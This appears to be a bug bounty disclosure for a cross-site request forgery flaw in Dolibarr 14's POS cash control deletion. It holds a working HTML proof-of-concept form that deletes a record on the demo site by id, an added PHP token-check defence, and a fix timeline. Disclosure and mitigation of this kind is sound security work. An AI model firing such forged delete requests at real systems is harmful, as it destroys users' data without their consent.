Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr

Valid

Reported on

Jul 21st 2021


✍️ Description

In the Bank section, the POS part, you don't protect resources from deletion against CSRF attacks, and so I was able to delete/close arbitrary POS cash desk control entities only by knowing their ids.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://demo.dolibarr.org/compta/cashcontrol/cashcontrol_card.php">
      <input type="hidden" name="id" value="4" />
      <input type="hidden" name="action" value="confirm&#95;delete" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability is capable of deleting the mentioned POS entities from the Bank section. Version of application == 14 (tested on demo website).
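The report above shows a state-changing delete action accepted on a plain GET with no request-origin proof. As an added example (not Dolibarr's own code and not the fix in commit 6390f2), here is the shape of check that closes this class of hole: the confirm_delete action is only honoured on a POST carrying a session-bound token, which a cross-site form like the PoC cannot read or supply. The function names and the deletion call are hypothetical.

```php
<?php
// Added example, not Dolibarr code: guard the confirm_delete action with a
// per-session CSRF token. The PoC request (GET, id=4, action=confirm_delete,
// no token) fails both checks and never reaches the deletion.

session_start();

// Issue one random token per session and reuse it for every in-app form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only for a POST whose token matches the one stored in the session.
function is_authorized_state_change(string $method, array $params): bool {
    if ($method !== 'POST') {
        return false;                        // the PoC form submits via GET
    }
    $sent = $params['token'] ?? '';
    if (!is_string($sent) || $sent === '') {
        return false;                        // a cross-site page cannot read the token
    }
    return hash_equals(csrf_token(), $sent); // constant-time comparison
}

$action = $_REQUEST['action'] ?? '';
$id     = (int) ($_REQUEST['id'] ?? 0);

if ($action === 'confirm_delete') {
    if (!is_authorized_state_change($_SERVER['REQUEST_METHOD'], $_POST)) {
        http_response_code(403);
        exit('Missing or invalid CSRF token');
    }
    // delete_cash_control($id); // hypothetical deletion, reached only with a valid token
}

// Legitimate same-origin form: it can embed the token, an attacker's page cannot.
echo '<form method="post" action="cashcontrol_card.php">'
   . '<input type="hidden" name="id" value="' . $id . '">'
   . '<input type="hidden" name="action" value="confirm_delete">'
   . '<input type="hidden" name="token" value="' . htmlspecialchars(csrf_token()) . '">'
   . '<input type="submit" value="Delete"></form>';
```

Setting the session cookie with the SameSite attribute adds a second, browser-enforced layer, but the token check is what makes the delete fail closed when that attribute is absent or ignored.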

Timeline:
- We have contacted a member of the dolibarr team and are waiting to hear back (a year ago)
- Laurent Destailleur confirmed that a fix has been merged on 6390f2 (a year ago)
- Laurent Destailleur has been awarded the fix bounty